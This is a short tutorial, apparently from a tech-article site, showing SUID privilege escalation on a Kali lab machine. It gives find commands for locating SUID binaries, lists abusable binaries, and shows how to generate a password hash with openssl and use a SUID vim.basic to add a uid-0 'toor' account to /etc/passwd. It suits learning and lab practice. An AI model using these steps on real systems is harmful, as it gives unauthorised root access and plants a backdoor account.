Linux uses suid vim.basic file to achieve privilege escalation

Linux uses suid vim.basic file to achieve privilege escalation

Reproduce on Kali

First set suid permissions for the required vim.basic file

chmod u+s /usr/bin/vim.basic

First adduser test1 a normal permission user

Now is a suitable environment for privilege escalation

You can find files with suid permissions by using the following command

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

The files that can be used to escalate privileges are

  • nmap
  • vim
  • find
  • bash
  • more
  • less
  • nano
  • cp

The idea of ​​using vim to elevate privileges is to modify the etc/passwd file and add a user with root privileges for yourself

The user format of the passwd file is: username:password:uid:gid:comment:home directory:user's shell

Here you can see the format of the root user

root:x:0:0:root:/root:/bin/bash

(The password part is x because the real password is stored in the /etc/shadow file)

Generate a password: use openssl passwd -1 –salt asd 123 (here is -1 (number 1) not L)

Write it directly in the passwd file.

toor:$1$asd$sTMDZlRI6L.jJEw2I.3x8.:0:0:root:/toor:/bin/bash

You can modify it with vim /etc/passwd, but when saving, E212 will appear, and it cannot be saved, prompting us that we do not have permission to modify this

At this time, you should use the vim.basic file found earlier to run it. This program has suid permissions. Definitely editable

vim.basic /etc/passwd

Use this to open, then modify the file and save it successfully

You can see that it has been added, switch to su toor, password 123, and then check the permissions with id

root permissions

chmod u+s /usr/bin/vim.basic

The above is the full content of this article. I hope it will be helpful for everyone’s study. I also hope that everyone will support 123WORDPRESS.COM.

You may also be interested in:
  • Trash-Cli: Command-line Recycle Bin Tool on Linux
  • 101 scripts to create a Linux recycle bin script
  • Quickly solve the Chinese input method problem under Linux
  • Use MySQL to open/modify port 3306 and open access permissions in Ubuntu/Linux environment
  • Detailed explanation of commands to read and write remote files using Vim in Linux system
  • Solution to Linux server graphics card crash
  • Detailed explanation of the implementation process and usage of the Linux Recycle Bin mechanism

<<:  An article to help you thoroughly understand position calculation in js

>>:  Detailed explanation of MySQL combined index method

Recommend

Mysql join query principle knowledge points

Mysql join query 1. Basic concepts Connect each r...

How to create WeChat games with CocosCreator

Table of contents 1. Download WeChat developer to...

Introduction to Docker containers

Docker Overview Docker is an open source software...

Implementation of multi-environment configuration (.env) of vue project

Table of contents What is multi-environment confi...

Summary of Vue's cross-domain problem handling and solutions

When you send a network request, the following sa...

The use of anchor points in HTML_PowerNode Java Academy

Now let's summarize several situations of con...

The difference between clientWidth, offsetWidth, scrollWidth in JavaScript

1. Concept They are all attributes of Element, in...

Native JavaScript to achieve the effect of carousel

This article shares the specific code for JavaScr...

The main idea of ​​​​dynamically setting routing permissions in Vue

I have seen some dynamic routing settings on the ...

How to deploy python crawler scripts on Linux and set up scheduled tasks

Last year, due to project needs, I wrote a crawle...

React implements the expansion and collapse function of complex search forms

Give time time and let the past go. In the previo...